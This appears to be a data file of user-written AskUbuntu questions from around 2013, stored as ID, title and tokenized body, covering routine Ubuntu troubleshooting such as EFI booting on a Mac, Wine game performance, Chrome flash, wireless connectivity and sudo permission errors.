313562	why is it necessary to install efi/refind/uefi/ ... on a sd card since the macbook pro seems to already have it ?	dear askubuntu members , i own a macbook pro ( late 2009 ) and when i boot the laptop and hold the alt key meanwhile , there is a efi screen , so efi is installed on ... the firmware ? i had a few troubles with my hard disk , so i had to change it , but i have n't installed os x , i have only installed ubuntu and still the efi screen is there which is surely a good thing . as the new hard disk is making troubles again , i am using puppy linux , booting from a cd each time , which is unconfortable . so i am trying to have ubuntu installed on a sd card . after having spent many months on the internet grabing informations anywhere i can and trying several things , i applied this method : http : //www.weihermueller.de/mac/ i succeeded in making one sd card recognizable by the efi of my laptop ( holding alt key @ boot ) , but nothing installed on it yet as i fear to lose the recognizable-by-efi part . i have n't succeded in producing the same result on another sd card . i have a bootable usb key of ubuntu ( yipee ) which works like a live cd , made with the help of universal linux udf creator , found there : http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ on which i have put ubuntu 13.04 64bit , retrieved from the official deposits . eventhough i have to add the `` nouveau.noaccel=1 '' option to the grub command line launching linux , it works ( yipee again ) properly as a live cd . when installing ubuntu i come across the `` where do i wan na put ubuntu '' window , i partition another sd card in : the efi part ( 40mb ) the linux part ( 15gb < < 16gb ) the installation works fine and finishes with no problem . but at the reboot , the sd card where linux is installed is not recognized by the efi , the icons are : the cd ( puppy linux ) , the usb stick ( from linux udf creator ) , the hard drive ( the formerly-working ubuntu 12 ) but no fourth icon of the sd card whatsoever . as the title of this thread suggests , i am wondering : why there is a need for efi to be installed on the sd card since efi seems to be on my laptop anyway ? why efi has to be on a different partition than the linux 's one ? how do both parts communicate ? why the efi part on the sd card made with the help of the live-usb key is n't recognized ? on the efi partition , there is a folder named `` efi '' which contains another folder named `` ubuntu '' which contains a file named `` grubx64.efi '' , why is there a thing called grub ? is it the linux 's grub where one can chose either to boot , to boot in safe mode , etc. ? thank you for your patience , looking forward for any kind of answer , julien
313564	why encrypt the swap partition	i have seen on this site that many linux users encrypt the swap partition . what are the benefits of encrypting swap ?
313565	how to upgrade ubuntu without losing packages ?	i 'm currently running ubuntu 10.something and i have some special packages installed for server tasks . i want to upgrade to ubuntu 12 and i 'm afraid that i 'll lose these packages . so what will happen if i chose the upgrade option when i put in the installation dvd ? will i lose the packages or not ?
313585	why is my laptop keyboard malfunctioning after running boot-repair ?	so , after using boot-repair to fix ( reinstall ) a grub issue , some of the keys on my laptop have ceased to work . the specific keys are ; , ' , /,0 , - , = and p. i tried swapping back to the live cd i ran boot-repair off , but the issue persists . i checked the region , and it seems to be the one i always used . i 'm using an external keyboard to type this . how can i revert to the situation to where the keys on my notebook were functional ?
313587	minecraft black screen after updating lwjgl ubuntu 13.04	i am trying to download minecraft and i get a black screen . i have already updated lwjgl to version 2.9.0 . i have ubuntu 13.04 .
313588	access network share of guest on host	i use an ubuntu 12.04 host system with a windows 7 guest in virtualbox . the virtual windows machine is member of a domain in which network drives are shared to it . i prefer to do most of the work on the host system and use the windows system for programs that do not run ( in an acceptable way ) on ubuntu ( yet ) only . therefore i need to access those folders shared to the windows guest system on the host system . is there any sort of reverse shared folder ( from guest to host ) ? the original workaround of sharing the folder via a host-only-network and mounting it on the host system does n't work because afaik it 's impossible to share a drive mapped via network . any suggestions on how to solve this in any way ?
313589	changing keyboard shortcuts	i am running ubuntu 12.04 and the keyboard shortcuts are not convenient in the terminal for my keyboard . to switch between tabs you have to type shift-ctrl-pgup . is there any way i can change that setting to ctrl+ [ arrow right/left ] ?
313592	how to install applications to a separate hdd ?	i was so good with windows , now iâm feeling like a complete idiot . i have an ssd for ubuntu and want to install the majority of my programs to a separate hdd but i have no clue how . all searches i have tried only turn up with dual-boot installations . ( resolved - > ) i am also having trouble locating `` /etc/ '' . specifically , to modify conky . searching for this term only turns up instances where people are telling you to access this file , not how to get to it .
313598	screensaver activates , screen fades , and computer goes to standby when watching video	when watching a video in a web browser ubuntu starts to fade out the screen and eventually goes to black after 2 minutes . i expect this because this is how i have my power settings set up . when i watch a movie in the video player the screen does not fade out . so it seems the system does n't realize there is something running when a video is playing in the browser . is there a way to fix this without making the power settings to always on ? ubuntu 13.04
313603	how do i set my resolution to 1680x1050 on my machine ?	xrandr shows : stel @ stel-desktop : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1400 x 1050 , maximum 1600 x 1600 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) crt1 connected 1400x1050+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1600x1200 60.0 + 1400x1050 60.0* 1600x900 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1366x768 59.8 1360x768 60.0 1280x800 59.8 1152x864 60.0 1280x768 59.9 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.3 800x480 60.0 720x480 60.0 640x480 59.9 crt2 disconnected ( normal left inverted right x axis y axis ) graphics card : stel @ stel-desktop : ~ $ lspci |grep `` vga '' 05:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati park [ mobility radeon hd 5430 ] i am using ubuntu with gnome 13.04 64-bit . my screen is really blurry right now without the ability to set the native resolution of my display connected ( 1680x1050 ) . how do i fix this ?
313607	google locking on ubuntu	problem i 'm facing is that google does n't respond well timed to connection requests send from any browsers known to linux . as far as i can tell , this was existent in mint , which is ubuntu based . i have no debug or guess about cause but i 'm sure there are people with the same problem . ping of terminal is untouched but any other browser keeps unloaded , for example ; google loads fine , i search for something . then i decide to search for something else and ta daa : you got ta wait for 30 seconds for google server to respond . i tried using google 's public dns without success . flare the suggestions & ideas ! ? ok , i think i `` fixed '' it . going to : about : config and deleting everything contains `` google '' fixed the load issue ! but of course it screwed almost whole of google . the theme turned back to 90 's and the fun started , images or any other search results can not be opened . any suggestions ? edit : restarting the firefox reverted everything that changed with my delete tweak and problem yet persists and all of the configs i screwed are disappeared . edit2 : safe mode did n't make any difference . i 've filled a bug report on chromium about it , yet did n't seemed to be popular yet . http : //code.google.com/p/chromium/issues/detail ? id=255434
313617	ubuntu 13.04 eclipse 3.8.1 fresh install.. can not read eclipse help files..ideas ?	i have recently setup a dual boot windows 7 /ubuntu 13.04 . problem : i installed eclipse from the ubuntu software center . eclipse opens fine , but when i attempt to access the help i get a `` server error 500 '' .. what i know : the help file is located locally and read via the browser.. any ideas ? .. nb.. novice linux user , happy to try anything to provide more data , ppls just be specific ( ie assume i know zilch.. ) update jun 30th.. although not an answer to this question , i have patched a working solution by removing the version of eclipse supplied by the ubuntu software center and installing from eclipse.org.. details at http : //ubuntuforums.org/showthread.php ? t=2157452 thanks
313619	could not save the file /usr/ ... permission denied ( 13.04 )	i am running ubuntu 13.04 and am trying to create an .sh file for conky in /usr/bin using gedit . when trying to save i get the error dialogue : could not save the file /usr/bin/conky-start.sh you do not have the permissions necessary to save the file . please check that you typed the location correctly and try again . '' from searching , i think i have to run a command in terminal to allow permission , but i could n't find out what that is . edit : i 'm trying to create the file conky-start.sh , not change or run it . thus far , i 've opened gedit , copied and pasted some required info from the net , and i 'm trying to save-as /usr/bin/conky-start.sh perhaps i need to create the file first in terminal , then edit it ? how would i do that ?
313621	brightness does n't work on desktop	i have a desktop assembled with one intel board dh67cl , running ubuntu 12.04 lts . the problem is that i ca n't adjust the brigthness of the monitor , as i can do when running windows 7 . looking for one solution in the web , i found out that the in my ubuntu , the directory /sys/class/backlight is empty . the same directory /sys/class/backlight , in my samsung notebook , has the folders : acpi_video0 and intel_backlight with respective files inside them . can you help me please , is there best solution to set right the resource , with no needs to reinstall the ubuntu ? best regards , jose ramos .
313623	install linux first before windows	am i able to install ubuntu first and then install windows ? i allocated ubuntu 15gb and im going to load the rest ( 900gb ) for windows but will grub loader work ? or do i have to install windows first and then ubuntu ? thanks
313626	no wireless in kernel 3.9.0	i get wireless when booting the older version , 3.8.0 , but no sound , so i 'm choosing to fix wireless on 3.9.0 as it seems easier . i am on ubuntu 13.04 . here 's my wireless adapter : lspci -vvnn | grep 14e4 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) i tried re-installing using this https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx but no luck any help would be immensely appreciated .
313627	uefi bootloader alternative to grub	i 'm having trouble with my current bootloader grub on ubuntu 12.04 . sometimes it takes forever too boot , other times it wont find the kernel image . my system uses uefi to boot , is there a uefi alternative to grub ?
313628	monitor wo n't go into sleep mode automatically after upgrading to 13.04	after upgrading to 13.04 from xubuntu 12.10 , my monitor no longer goes to sleep automatically . in power manager , on ac , monitor , i have it set to put the display to sleep after 10 minutes off after 15 , but the monitor stays on the whole time . however , i can manually put the monitor in sleep mode by running xset dpms force off . any ideas ? edit : on further investigation , even if i use xset dpms force off , the monitor switches back on after a 10-15 seconds , but the screensaver does not go off .
313633	su , sudo and upgrade problem	i have a big problem with my ubuntu pc . when i try sometigng need sudo or su , nothing is working and the os upgrade too , when i write the root password to the su command i have a `` autentication error '' , same in the upgrades and when i try the sudo command to install something i do n't have error message and nothing happen . i was tring to make samba work when all goes wrong . some help ! ? thanks ! edit ssh connection refused and connection closed if i try to login from secondary pc i ca n't access recovery mode ... with the autologin i can access the system , if i logout and try to login again return the autentication error
313635	how to move unknown files to unknown directories based on folder name ?	i am trying to write a script that will search a directory for a folder , and move the folders contents one directory up from their location . this is what i have so far : find ./localfolders -name 'file ' -type d -exec mv { } /* .. \ ; i think my problem lies in the destination directory of ... perhaps i am expressing this wrong ? any help is useful . *edit** to simplify this ill go into more info i am with an organization that it attempting to move from ms exchange to zimbra . as part of our migration we have found great utilities that transfer mailboxes but transferring pst files to zimbra usable format is proving challenging . i have found some solutions though to make a long story short , i have been able to spin out pst files to a usable format with one exception – instead of putting the mail in that folder a sub directory is created called “mbox” presumably resembling the mbox file that the .eml files are being broken out from . because each user is different and uses different folder structures from other users , each directory is unknown until the script runs . additionally the contents of the mbox folder are also unique . because the folder named mbox is the only constant in these directories i am trying to use find to locate those folders take that folders contents and move them up one directory , then delete the folder named mbox . here is the actual command as it appears in my script : find localfolders -name mbox -type d -exec mv { } /* .. \ ; or in the example you just gave : find localfolders -name mbox -type d -execdir sh -c 'echo mv { } /* .. ' \ ; i am trying to use the * as a wildcard to select everything in the mbox folder . as best as i can tell it is instead being treated as part of the directory , and not the wildcard as intended thoughts ?
313640	something went wrong with my packages	i keep getting this error when i tried to upgrade , please help sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : geany-common libvte-common libvte9 linux-headers-3.8.0-19 linux-headers-3.8.0-19-generic linux-image-3.8.0-19-generic linux-image-extra-3.8.0-19-generic teeworlds-data use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libboost-thread1.49.0 the following new packages will be installed : libboost-thread1.49.0 0 upgraded , 1 newly installed , 0 to remove and 16 not upgraded . need to get 0 b/41.7 kb of archives . after this operation , 168 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package libboost-thread1.49.0 . dpkg : unrecoverable fatal error , aborting : reading files list for package 'libboost1.49-dev ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 )
313646	how do i get adobe flash working in chrome or chromium on ringtail ?	i have recently upgraded to ringtail and for some reason flash is n't working on either chrome or chromium . it works in firefox but i prefer chrome as my browser so switching to firefox when a website containing flash appears is a bit annoying . according to just about every source , flash it built into chrome and should just work even on ubuntu . i tried removing chrome and reinstalling it , but the problem persists . i 've checked about : //plugins and flash is enabled . yet when you visit http : //www.adobe.com/shockwave/welcome/ what i see is `` no plugin available to display this content '' . about : //version shows google chrome 28.0.1500.52 ( official build 207119 ) os linux blink 537.36 ( @ 152651 ) javascript v8 3.18.5.8 flash 11.7.700.203 user agent mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.36 ( khtml , like gecko ) chrome/28.0.1500.52 safari/537.36 command line /opt/google/chrome/google-chrome -- blacklist-accelerated-compositing -- flag-switches-begin -- enable-sync-favicons -- sync-keystore-encryption -- flag-switches-end executable path /opt/google/chrome/google-chrome how do i get flash working in chrome or chromium ?
313648	eclipse no longer useful	when i got my eclipse from the ubuntu software center , it was good and worked fine . i could work on java projects fine . this week i was required to add adt and tried the adt-bundle , assuming it had everthing i needed , seeing that the sdk had more steps . so now , i can create android apps using the adt-bundle . i tried to work on my java projects again and i now discovered : i ca n't run my java projects : `` the selection can not be launched . and there are no recent launches . '' error . i also believe eclipse doesn't know it 's a java program because it all in black and white . not the usual green/blue/red/black things when making comments , variables and strings . i ca n't make new projects of anything unless i use the adt-bundle . new project only offers cvs ( whatever that is ) my perspectives seem limited . i remembered more choices and now i'm limited to [ java ] , resource , cvs repository , debug , team sync . i was told to be able to use perspectives to swap between android and java developing . even after the adt installation using `` install new software '' , nothing . i ca n't uninstall/purge/remove eclipse via the terminal . i tried removing it then reinstalling it via the ubuntu software cetner . no results other than it 's temporary removal . ( possibly unrelated ) a large number of repositories are not found when updating eclipse . ( see step 8 in summary of what i did ... ) although , on checking the versions and installation history , i confirmed android and java are installed . it probably just does n't know it 's there . eclipse indigo : version : 3.7.2 build id : i20110613-1736 summary of what i did before and during the problem : downloaded adt-bundle . attempted instructions from teacher . ( install new software ) ( failed but other than an annoying `` ca n't find repository '' during each update , no damage to report ) ( fixed ) ran `` eclipse '' executable from the adt-bundle . updated eclipse . ( after restart , i noticed the problem ) note : other than window arrangement , i had no customizations . played around with the windows > preferences and project > propertied . restored to default settings after no results . tried `` apt-get purge eclipse '' . could n't find eclipse so , nothing happened . used software center . no results . tried swapping workspaces . i tried different folder , deeper folder , renaming . all return the same problem . deleted adt-bundle ( browsed folders then delete ) . got adt-sdk only . installed . ca n't find any changes other than some disk space usage . of course , i ca n't make android apps until i unzip the bundle again . windows > preferences > install/update > available software sites , checked as many repositories as possible , then updated . still nothing . i 'm about to get a second try on uninstalling it , because i think my last action will just be taking up space . but i 'll wait for tomorrow , in case the answer will help . any thoughts ?
313654	google chrome wo n't open	when i try to open google chrome from the launcher , nothing seems to happen . ( this is a new phenomenon , it used to work ) . i 'm on ubuntu 13.04 . when i try to open via the terminal with either google-chrome google-chrome -- incognito i get , fatal : zygote_host_impl_linux.cc ( 138 ) ] the suid sandbox helper binary was found , but is not configured correctly . rather than run without sandboxing i 'm aborting now . you need to make sure that /opt/google/chrome/chrome-sandbox is owned by root and has mode 4755 . any help would be appreciated .
313659	error message when running opengl programs with bumblebee	x error of failed request : baddrawable ( invalid pixmap or window parameter ) major opcode of failed request : 152 ( dri2 ) minor opcode of failed request : 8 ( dri2swapbuffers ) resource id in failed request : 0x4200005 serial number of failed request : 2166 current serial number in output stream : 2167 primus : warning : timeout waiting for display worker segmentation fault ( core dumped ) i do n't get this on all ogl programs , but only particularly gpu intense ones . also , i only get this using primusrun . optirun gives the same error no matter what i run : [ vgl ] notice : pixel format of 2d x server does not match pixel format of [ vgl ] pbuffer . disabling pbo readback . i do n't know what either of these mean . neither of them stop the programs from running , but i 'd like to fix the problem if there is one . also , i prefer to use primusrun because it is faster and it does a better job with vertical sync , however , it only supports ogl 4.2 . this is n't a big issue because the programs i write are forward compatible , but it still seems odd to me . so basically i 'd just like it if someone could explain to me what is happening and if there is something i can do about it . thanks .
313663	how to boot ubuntu on mac	i tried many ways to boot ubuntu on my mac os . i do not have an internal cd drive but wen i tried to install it using the external cd drive ( from apple ) , the drive does not work ( apple made it clear that u cant do this ) . i tried using many tools . i downloaded the amd64+mac edition and copid it to my usb using unetbootin.. it said that it would not boot of mac but the instructions on another blog was that it has no problems as the iso will take care . it also instructed to install refit and it worked for him but dosent boot for me . i even tried the terminal method of installing but did n't work ... please help me out
313669	how can i use a proxy for a specific ppa ?	i just want to use a proxy for 1 or 2 specific ppas , not all ppas . how can i do this ? i 've tried to put : acquire { http : :proxy “http : //user : pass @ yourproxyaddress : port” } in apt.conf , but that sets a proxy for all ppas .
313670	why are my games so slow through wine ?	okay , so for starters , hi . : p i 'm a -complete- ubuntu noob , so please be gentle in your criticism , and if you find a glaringly obvious error , please point it out ! : d but do n't pull your hair out , okay ? all right—here 's my actual question : to make a long story short , i recently converted my laptop from windows to ubuntu , because we did a system restore , the windows install got corrupted , and things were lost . after we picked ourselves back up , i still needed this computer , so i decided to try out linux . never had before , heard good things about it , decided to give it a shot . after falling in love with ubuntu 's functionality ( once i got used to the new interface and layout ) , i wanted to try some games . discovering i needed wine to run anything windows-based , i downloaded it and fired it up . nothing worked . so i poked around the web some more and discovered i 'd need directx to do anything significant , which in turn needed .net framework . using this ( http : //www.dedoimedo.com/games/wine-directx.html ) tutorial for directx and downloading wine 3.5 off of winetricks , i thought i had everything sorted . unfortunately , i do n't . what worked fine on windows either does n't work or runs like it was stuck in molasses . now , i know there are a lot of programs that have compatibility issues with wine , and i 'm working my way through them , but what i do n't understand is the slow-running programs part . here are my system specs ( insofar as i 've been able to decipher them—still getting used to the new linux way of reading stuff ) : toshiba satellite l455d-s5976 cpu : amd sempron si-42 single-core 2.1 ghz ram : 3gb ( 2.7 technically ) hdd : 500gb gpu : ati mobility radeon hd 3100 here 's a partial list of the games i 've been trying : supreme commander command and conquer : generals ( zero-hour ) assassin 's creed world in conflict star ruler ( blind mind studios ) trackmania ( nadeo ) battlefield 2 x3 : terran conflict ( egosoft ) rubber ninjas sim city 4 i would think that it was just my system being slow—because , admittedly , i do n't have the system requirements to really run ac—but here 's the weird part , at least with that game . in the opening intro , it 'll run at around 10fps for about 3 seconds , and then kick up to—oh i dunno—60 or so , faster than it ever had on my previous laptop which was actually better than this current one . and , for example , games like rubber ninjas , c & c , supcom , and wic all ran smoothly on my first laptop which was similarly specced to this one—in fact , i think it was another toshiba satellite , actually . oh ! and another quick question—when i first installed wine , unconfigured , i installed derek smart 's universal combat ( do n't shoot me : p ) , and it worked fine . now after some other games and some reconfiguring , it wo n't work at all , even if i reset to default settings . so , am i doing something wrong ? does wine need to be configured differently ? i 'm completely lost , here , and any help would be -greatly- appreciated , thank you . i do sincerely apologize for the wall of text , here , but i did n't want to leave any detail out , as that tends to make things harder for all parties involved . so , thanks so much for any help you can provide , or even a direction to point me in ; i 'll eagerly await your answer . p.s : i recently discovered clockgen , found here ( http : //www.techspot.com/community/topics/overclocking-a-toshiba-satellite-laptop.32667/ ) : and was wondering , is overclocking a viable solution ? i do n't remember what command i used to find my cpu speed—but it said my current speed was 2100mhz ( aka 2.1 gigs ) , but the kicker was that my “max” speed was 4,000 mhz . now , i would never dream of overclocking a laptop , or even a desktop , to that ridiculous speed , but even if i could get 2.4 or 5 out of it ... and i would take full responsibility for the wrath i incur from the laptop gods . i would never run this thing unplugged—i do n't anyway already so a battery 's pretty much moot for me ... and i have a high-speed fan running under any laptop at all times—scorched my pants with my first laptop and have been wary ever since .
313674	granting administrator privileges to user not working ?	i saw the sudoers manual and plan to eventually give the user only rights to run specific programs , but tried testing it with all permissions and it is n't working . sudo -l shows this : [ sudo ] password for nav : matching defaults entries for nav on this host : env_reset , secure_path=/usr/local/sbin\ : /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin user nav may run the following commands on this host : ( all : all ) all ( all : all ) all but yet when i try apt-get install firefox i get this : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? my actual aim is to run truecrypt without having it to ask for the ubuntu login password , but before that i 'd at least like to be able to run other commands without having to type sudo . any idea what i 'm doing wrong ? also tried this solution and it did n't work .
313678	how to resize page back to normal size	i have a dell inspiron mini with floating touch pad bout 4 years old . i accidentally , by pressing on lower right edge of unit , miniturized the image on the page . its so small now i cant see it , this has happed 4 times now . i need to resize image back to normal full screen ! i do'nt know if its software or hardware issue ? ? can you help ?
313680	files lost during move & power failure	i was moving ( using the default ubuntu file manager ) some photos from my sd card ( formated fat32 ) to a ntfs drive on my computer when a power failure occured . after that , i used the sd card in my camera , made some new pictures and then moved all the pictures from the card to another computer . after starting the first computer , some 2 gb of files where missing from my sd card , and the folder where i moved them was shown empty in ubuntu . i checked & repaired the drive in windows 7 , this got me access to a couple of files from the ones i had lost . going back to ubuntu , i tried using photorec both on the sd card and ntfs drive , but with no luck - i did not recover the photos i was looking for , but only other photos . at this time , the sd card should be almost empty ( it only contains a .trash folder with about 200 mb of files ) . checking it properties , it shows around 2 gb ( the same size as my lost files ) as used . any ideas ?
313681	how to add the ubuntu one indicator in lubuntu 13.04	i have only managed to find guides for 12.04 and am needing a dock applet to show status of sync .
313682	heating issues and fan sound on dell inspiron 3521 running ubuntu 13.04	i have tried various solutions available online 1 ) added pcie_aspm=force to /etc/default/grub 2 ) since jupiter is no longer available in 13.04 , installed tlp but still fan is making lot of sound ( its running very fast i guess ) and temperatures are around 60c ( and sometimes even increasing ) even on normal load . but on windows8 , its fine . i bought the laptop just a week ago . even battery is very bad in ubuntu . it hardly lasts for 2 hours on normal usage ( which lasts for around 4 hours for same usage in windows ) . how can i improve battery performance ? please help .
313685	need driver for panasonic kx-mb1520	recently , i purchased panasonic kx-mb 1520 all-in-one laser printer with fax . i have installation cd with me but it is available only for microsoft windows os . please provide its drivers and help me install this printer on ubuntu 12.04 lts or time being ( urgent makeshift solution ) please tell me ... if i install wine and run installation/driver cd will it work ?
313687	connected to wireless , but no internet access	after installing ubuntu 12.04 a week ago wireless internet had been working fine . it stopped working yesterday , however , and i 'm at a loss for what to do even after scouring replies to similar posted problems . i have tried using google 's public dns and turning off proxy settings on firefox . i have used nm-tool and lshw to make sure my wireless device and driver are connected . if anyone can help me resolve this issue i would be extremely grateful ! outputs : $ ping -c3 www.google.com ping : unknown host www.google.com $ ping -c4 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.1.104 icmp_seq=1 destination host unreachable ... -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 0 received , +4 errors , 100 % packet loss , time 3014ms $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 $ nm-tool | grep dns dns : 192.168.1.1 $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 $ ping -c4 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data from 192.168.1.104 icmp_seq=1 destination host unavailable from 192.168.1.104 icmp_seq=2 destination host unavailable -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 0 received , +2 errors , 100 % packet loss , time 2998ms pipe 4 $ ifconfig eth0 link encap : ethernet hwaddr 88 : ae:1d:58:9d:0b up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:235 errors:0 dropped:0 overruns:0 frame:0 tx packets:235 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:16266 ( 16.2 kb ) tx bytes:16266 ( 16.2 kb ) wlan0 link encap : ethernet hwaddr 00:23:15:35 : ce:2c inet addr:192.168.1.104 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :223:15ff : fe35 : ce2c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:420 errors:0 dropped:0 overruns:0 frame:0 tx packets:264 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:109306 ( 109.3 kb ) tx bytes:27642 ( 27.6 kb ) wmax0 link encap : ethernet hwaddr 64:64 : da:04:52 : b5 up noarp mtu:1400 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:20 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) $ cat /etc/network/interfaces auto lo iface lo inet loopback $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : 88 : ae:1d:58:9d:0b size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:6000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff *-network description : wireless interface product : centrino advanced-n + wimax 6250 vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 57 serial : 00:23:15:35 : ce:2c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-34-generic firmware=41.28.5.1 build 33926 ip=192.168.1.104 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:43 memory : d4600000-d4601fff *-network description : ethernet interface physical id : 2 logical name : wmx0 serial : 64 : d4 : da:04:52 : b5 capabilities : ethernet physical configuration : driver=i2400m_usb firmware=i6050-fw-usb-1.5.sbcf link=no $ dmesg | grep iwl [ 15.388067 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 15.388072 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation [ 15.388180 ] iwlwifi 0000:06:00.0 : pci_resource_len = 0x00002000 [ 15.388183 ] iwlwifi 0000:06:00.0 : pci_resource_base = ffffc9000067c000 [ 15.388186 ] iwlwifi 0000:06:00.0 : hw revision id = 0x57 [ 15.388263 ] iwlwifi 0000:06:00.0 : irq 43 for msi/msi-x [ 15.391065 ] iwlwifi 0000:06:00.0 : loaded firmware version 41.28.5.1 build 33926 [ 15.391352 ] iwlwifi 0000:06:00.0 : config_iwlwifi_debug disabled [ 15.391356 ] iwlwifi 0000:06:00.0 : config_iwlwifi_debugfs enabled [ 15.391358 ] iwlwifi 0000:06:00.0 : config_iwlwifi_device_tracing enabled [ 15.391360 ] iwlwifi 0000:06:00.0 : config_iwlwifi_device_testmode enabled [ 15.391362 ] iwlwifi 0000:06:00.0 : config_iwlwifi_p2p disabled [ 15.391365 ] iwlwifi 0000:06:00.0 : detected intel ( r ) centrino ( r ) advanced-n + wimax 6250 agn , rev=0x84 [ 15.391427 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 15.399876 ] iwlwifi 0000:06:00.0 : device eeprom ver=0x552 , calib=0x6 [ 15.399880 ] iwlwifi 0000:06:00.0 : device sku : 0x1f0 [ 15.399883 ] iwlwifi 0000:06:00.0 : valid tx ant : 0x3 , valid rx ant : 0x3 [ 15.399910 ] iwlwifi 0000:06:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 15.510715 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 18.862936 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 18.863126 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0 [ 19.106527 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 19.106721 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0 [ 3754.102289 ] iwlwifi 0000:06:00.0 : rf_kill bit toggled to disable radio . [ 3754.102506 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.103049 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.114930 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.114945 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.114957 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.115002 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.115039 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.115049 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.116099 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.128114 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3754.138152 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3756.419608 ] iwlwifi 0000:06:00.0 : rf_kill bit toggled to enable radio . [ 3756.421101 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 3756.421286 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0 [ 3762.839399 ] iwlwifi 0000:06:00.0 : rf_kill bit toggled to disable radio . [ 3762.840221 ] iwlwifi 0000:06:00.0 : not sending command - rf kill [ 3776.333700 ] iwlwifi 0000:06:00.0 : rf_kill bit toggled to enable radio . [ 3776.335758 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 3776.335951 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0 [ 4214.253483 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 4214.253686 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0 [ 4305.514303 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 4305.514509 ] iwlwifi 0000:06:00.0 : radio type=0x1-0x2-0x0
